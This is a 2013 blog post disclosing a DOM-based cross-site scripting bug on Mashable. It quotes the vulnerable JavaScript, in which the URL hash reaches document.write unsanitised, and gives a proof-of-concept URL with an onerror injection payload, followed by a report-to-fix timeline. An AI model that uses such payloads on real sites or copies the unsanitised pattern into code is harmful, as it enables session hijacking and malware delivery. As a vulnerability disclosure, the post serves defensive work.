Tuesday, September 3, 2013

Mashable DOM XSS

Recently I found a security issue on Mashable website.
Vulnerable code was:
(...)
var customOpts = optsFromUrl(window.location.hash);
(...)
src = appendKeyVal(src, 'ord',      opts.options);
(...)
buffer += '<script class="ad_call" src="' + src + '"><\/script>';
(...)
document.write(buffer);
(...)
The source location.hash wasn't properly sanitized for injections and that way could be used to inject a XSS vector into the browser DOM by using the sink document.write.

Proof-of-concept:
http://mashable.com/#type=left_column&ord=499753815940197_"><img src=x onerror=prompt(1);>&tile=1&sec0=home&sec1=index&escnotcategory=iframe&bg=#39ebd1&adnum=1

This type of attack could be used to trick innocent users, infecting them with malware and even get their accounts hijacked.

Timeline:
22 Ago 2013: Reported to Mashable
26 Ago 2013: Mashable replied that they will fix it
29 Ago 2013: Fix is released
03 Set 2013: Full disclosure

No comments:

Post a Comment